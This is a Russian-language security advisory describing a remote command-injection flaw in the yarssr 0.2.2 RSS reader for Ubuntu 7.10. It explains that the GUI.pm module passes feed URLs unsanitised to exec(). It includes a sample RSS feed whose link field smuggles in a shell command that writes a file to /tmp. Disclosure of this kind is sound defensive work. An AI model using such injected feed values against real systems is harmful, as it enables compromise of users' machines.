Выполнение произвольных команд в yarssr

Дата публикации:
01.11.2007
Дата изменения:
01.11.2007
Всего просмотров:
923
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
yarssr 0.x
Уязвимые версии: yarssr 0.2.2 для Ubuntu 7.10

Описание:
Уязвимость позволяет удаленному пользователю скомпрометировать целевую систему.

Уязвимость существует из-за того, что модуль GUI.pm недостаточно обрабатывает данные в URL перед выполнением "exec()" для запуска браузера. Злоумышленник может с помощью специально сформированной силки на RSS источник выполнить произвольные команды на системе. Для успешной эксплуатации уязвимости требуется, чтобы была отключена обработка URL с помощью Gnome. Пример:

<?xml version="1.0" encoding="ISO-8859-1"?>
<rss version="2.0"
xmlns:blogChannel="http://www.example.com/blogChannelModule">
<channel>
<title>test feed</title>
<item>
<title>test post - create /tmp/created_file</title>
<link>http://www.example2.com";perl -e "print 'could run anything here' " >
"/tmp/created_file</link>
<pubDate>Fri, 26 Oct 2007 14:10:25 +0300</pubDate>
</item>
</channel>
</rss>

URL производителя: yarssr.sf.net

Решение: Способов устранения уязвимости не существует в настоящее время.

или введите имя

CAPTCHA